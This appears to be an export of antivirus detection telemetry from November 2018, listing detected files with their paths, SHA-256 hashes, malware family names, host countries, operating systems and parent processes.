  Row(detection=Row(filename='pcsws.exe', filepath='C:\\Program Files\\IBM\\Client Access\\Emulator\\pcsws.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c56bf9e4394213e64d50fb445064f70191378dd1f59b058d0bff581ac3c639a6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2633216, timestamp='2018-11-01T11:29:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\win10pc\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--allhard --logformat=singleline \\\\\\/s \\\\\\/a \\\\\\/l DESKTOP-QDGQVLH.log --defaultaction=ignore', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\acer_Avira\\scancl\\scancl.exe', parentsize=528744, timestamp='2018-11-01T15:45:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-pazera_free_mov_to_avi_converter.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\Downloader-fuer-Pazera_Free_MOV_to_AVI_Converter.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6aebd1d925b21a9928f8c876c1b660c171ffac9f1875be9e26d8c786cbe688dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110642-da413b89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110642-DA413B89', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T07:49:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='C:\\Program Files\\Gsm Box Cracked Full Pack By TCS\\AutoPlay\\Docs\\TM Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='aeinv.dll,UpdateSoftwareInventory', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-01T17:56:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211832-b1fd7656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211832-B1FD7656', filesize=3776000, name='PUA/AD.Dlhelper.B.#M1.#R1'), hash='ceb610e3c14002a680b0aa70eae832b14011b212c247a18974dbcb7fafff663a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='h:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T08:08:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111228-05e8310d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111228-05E8310D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lanzador.exe', filepath='\\\\?\\C:\\Lista_cv\\Nuevo\\Lanzador.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='d1d40f2a8c00a5ec11252ac6ea77efa434d37d54079b2d9746ed1b9004d3dd0d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142933-f850024b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142933-F850024B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110937-f0688e6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110937-F0688E6D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,qxvfw', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T21:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:17:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112235-528836c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112235-528836C8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112006-3fb270b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112006-3FB270B0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a9054675e0617c8d5d94d435a9b2f632fad930061690840bcc2046e5df10b1cb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A9054675E0617C8D5D94D435A9B2F632FAD930061690840BCC2046E5DF10B1CB', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a9054675e0617c8d5d94d435a9b2f632fad930061690840bcc2046e5df10b1cb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='convertpdf.exe', filepath='D:\\New folder\\Program Files\\Adobe\\Acrobat 8.0\\Designer 8.0\\ConvertPDF.exe', filesize=616000, name='W32/Sality.AT.#M1.#R1'), hash='2f802a9ae598af9d87138d3c46c332e9b73cf6fa633e70d39b4d689810a2278a', metadata=Row(cmdline='\\/min', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avgnt.exe', parentsize=919544, timestamp='2018-11-01T04:17:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxmin.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\asas\\bin\\winx64\\maxmin.exe', filesize=4096000, name='W32/Ramnit.CD.#M1.#R1'), hash='4676e9444b7c4c3605b8daa1063467b7e22625a9a7d0d9040dbf1a83c72bdf25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T20:47:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1408c8d43d5e60a7a309318ee865723047bea4282ec9314da827e0a3dd90b116', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T18:26:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8ed4', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8ed4', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201227-63c8b142', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-201227-63C8B142', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:12:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Nuova cartella\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Desktop\\Nuova cartella\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:14:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-004046-a37fefd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-003701-827BAB03\\AVSCAN-20181103-004046-A37FEFD3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='#new hack ghost wolf v1.0.3[vip].vir', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.564\\#New Hack Ghost Wolf V1.0.3[VIP].VIR', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:54:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083049-86d2a306', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07863e8e\\AVSCAN-20181101-082637-63AB43C4\\AVSCAN-20181101-083049-86D2A306', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\AK3S1RSOI7\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='06967b05063de0517c283f751c4262fb8e7d30198fdaf1300ff24f0fc5a670b3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9i4AXBU3YE6JF+U4.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T04:15:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090755-15717757', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224049-77016E40\\AVSCAN-20181102-090755-15717757', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016_2.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Setup_WinThruster_2016_2.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/onboot', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3911248, timestamp='2018-11-01T09:12:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0119532.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119532.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:38:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='patcherpatch.exe', filepath='\\?\\J:\\BlackShot\\patcherpatch.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='045372eb83885dda6300cf1073203cf42f65e397dedf9b069db1f2f0e58f4608', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:40:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ssmypics.scr', filepath='D:\\Backup\\Windows\\system32\\ssmypics.scr', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='07eb4da54209999e01890a8877cf085699d514c70b5f4da80f63aeddbc1f30b9', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='african farm.exe', filepath='E:\\العاب\\African Farm\\African Farm.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='77fab084931064bb1820d011cdad9ab3772cb2cf72d0237318dd3e0f32f7f0db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T22:27:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Users\\X\\Dropbox\\KMSPico v4.3\\KMSpico Only Service\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='\\\\\\/autoplay -Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T23:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='c:\\users\\X\\downloads\\setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='255847c3a4ef5e8d59cb0c657ac0b0dcd71b0e7fb36193975c67e8934812bfe9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\255847C3A4EF5E8D59CB0C657AC0B0DCD71B0E7FB36193975C67E8934812BFE9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='255847c3a4ef5e8d59cb0c657ac0b0dcd71b0e7fb36193975c67e8934812bfe9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='虹彩六號-圍攻行動.exe', filepath='c:\\users\\X\\downloads\\tomclancysrainbowsixsiege v6.3\\tomclancysrainbowsixsiege\\虹彩六號-圍攻行動.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='25fcb6be8f258d6c6b8fec86c10867cefcdd948001412e6e97c333b025a9ab5b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:21:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='symsilent.pif', filepath='C:\\Users\\X\\Symantec\\SymSilent\\SymSilent.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srqqqzrd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\srqqQZrd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212740-0f7a1f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212740-0F7A1F12', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163142-b479ccb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de473176\\AVSCAN-20181101-162541-91A22639\\AVSCAN-20181101-163142-B479CCB6', filesize=640000, name='HEUR/AGEN.1000013.#M1.#R1'), hash='948ced06aa3f80c3fa273973ae307895ddcd5b90651f7fe04f292c5eaced7e61', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='be4005c3715a02ad1004b49b450292a2876ca917bbc77f22151d51d2e59d2d95', metadata=Row(cmdline='-k secsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094658-1bab286a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094658-1BAB286A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:05Z'), dt=datetime.date(2018, 11, 1)),
